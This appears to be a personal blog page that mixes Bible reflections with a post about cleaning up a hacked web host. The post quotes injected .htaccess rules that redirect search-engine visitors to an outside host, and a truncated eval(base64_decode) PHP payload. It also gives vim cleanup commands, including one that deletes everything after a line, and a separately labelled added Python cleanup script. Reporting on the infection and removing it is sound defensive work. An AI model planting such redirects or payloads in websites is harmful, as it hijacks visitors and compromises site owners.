Deadline

I’m behind on a lot of stuff. Sure, I could write about it now, or complain. But now, after a nap and spending some time with God, I’d rather do it to the Lord and get it done on time (sort of).


Up and Done with It

For the past year, I was worried about keeping this thing going. It’s a good thing, and I’d like for it to stay online.

All I have to do is write a post. Done!


PHP/.htaccess Hacks

Today, I got an email from not a client, but a user of a client’s site telling me something was wrong.

Hearing that isn’t good.

So I combed through the code to see what it could be and found the problem. It seemed the following code was being placed into the .htaccess file:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://you-search.in/in.cgi?4&parameter=sf [R,L]

….and this code within index.php files:


<?php eval(base64_decode("JGw9**bla bla bla bla**")); ?>

That was nasty. Fortunately, it only broke that one site I was contacted about. At first, I thought it was that my FTP account was hacked or something. However, I found that someone else was having this problem too, and at the same time (or at least 10 or so hours earlier). His post was helpful in helping me not blame myself and see what the situation was as a whole.

After I finished fixing the one site and reading that blog post, I started combing through the other directories. Here’s what I noticed:

  • In each directory, I noticed that the index.php and .htaccess were infected with this code. To check and see if other files had problems as well, I listed all the files in my FTP program by its modified date, as shown below:
    Checking to see which files have been affected.
  • Only sites in my /domains directory that were affected had either Horde, WordPress, Drupal, or Modx installed. Even installations that did not have a public URL.
  • I used the following search and replace commands in vim to help out:
    For index.php:

    %s/eval(base64_decode("JGw9**bla-bla-bla-bla**"));//g

    For .htaccess:

    .,$s/.*//g

    Warning: This deletes everything after the line it is run on! I could not find a suitable way to include the malicious code into search and replace (it was late), but this helped by going to the top of where the malicious code starts, and running it that way.

That’s enough for now. Some kids my age go out and party. I just fix security issues that arise.
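
As an added example (not part of the original post), the Python below removes only the injected pieces instead of blanking everything after the cursor line: the whole `eval(base64_decode(...))` tag in index.php, and in .htaccess each run of `HTTP_REFERER` conditions that ends in a redirect to an absolute URL, together with the `RewriteEngine On` / `RewriteOptions inherit` pair directly above it. The function names, the sample inputs, the payload string and the `redirect.invalid` host are constructed for illustration; matching by shape is an assumption based on the two snippets quoted above.

```python
import re

# Patterns follow the shape of the two injections quoted in the post. Assumptions:
# the PHP payload is a whole <?php ... ?> tag, and the .htaccess block is a run of
# referer conditions ending in a redirect to an absolute http(s) URL.
PHP_INJECT = re.compile(r'<\?php\s+eval\(base64_decode\("[^"]*"\)\);\s*\?>\s*')
REFERER_COND = re.compile(r'^\s*RewriteCond\s+%\{HTTP_REFERER\}', re.I)
EXTERNAL_RULE = re.compile(r'^\s*RewriteRule\s+\S+\s+https?://', re.I)
ENGINE = re.compile(r'^\s*RewriteEngine\s+On\s*$', re.I)
OPTIONS = re.compile(r'^\s*RewriteOptions\s+inherit\s*$', re.I)

# Constructed samples: placeholder payload and redirect host, not the real ones.
SAMPLE_PHP = ('<?php eval(base64_decode("Q09OU1RSVUNURUQ=")); ?>\n'
              '<?php\nrequire "wp-blog-header.php";\n')
SAMPLE_HTACCESS = r"""RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC]
RewriteRule .* http://redirect.invalid/in.cgi [R,L]
# BEGIN WordPress
RewriteEngine On
RewriteRule ^index\.php$ - [L]
# END WordPress
"""


def clean_php(text):
    """Return (cleaned text, number of injected tags removed); nothing is decoded."""
    return PHP_INJECT.subn('', text)


def clean_htaccess(text):
    """Return (cleaned text, number of injected blocks removed), keeping every
    line that is not part of an injected block, including rules below it."""
    lines = text.splitlines(keepends=True)
    out, removed, i = [], 0, 0
    while i < len(lines):
        j = i
        while j < len(lines) and REFERER_COND.match(lines[j]):
            j += 1
        if i < j < len(lines) and EXTERNAL_RULE.match(lines[j]):
            # Also drop the RewriteEngine/RewriteOptions pair directly above the block.
            if len(out) >= 2 and ENGINE.match(out[-2]) and OPTIONS.match(out[-1]):
                del out[-2:]
            removed += 1
            i = j + 1
        else:
            out.append(lines[i])
            i += 1
    return ''.join(out), removed
```

A referer condition followed by a non-redirecting rule (for instance hotlink protection ending in `- [F]`) is left in place, so compare the returned text with the original before writing it back.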


The Boundless Bible

Wherein I suffer trouble, as an evil doer, even unto bonds; but the word of God is not bound.

-2 Timothy 2:9 (WEB|KJV)

What a powerful statement. God’s Word is limitless!

The words of the LORD are pure words: as silver tried in a furnace of earth, purified seven times. Thou shalt keep them, O LORD, thou shalt preserve them from this generation for ever.

– Psalm 12:6 (KJV|WEB)


The Word Always Speaks

Sometimes, when reading the Bible (also known as the word of God), I come across one of those “sticky” parts, i.e. where something seems to stand out or look strange or funny.

For some reason, there seems to be this attitude in the world that if you find something that looks funny or out of sync in the Bible, you’re supposed to either a) ignore it entirely or b) say the Bible is false; both are wrong. Actually, the more I “question” the Word (with an open ear to God of course), I end up believing it more than I probably would have without investigating it.

Ask, and it shall be given you; seek, and ye shall find; knock, and it shall be opened unto you.

How great is it that God opens the door to us when we knock. So go ahead, knock.
Matt. 7:7 – American Standard Version (ASV)

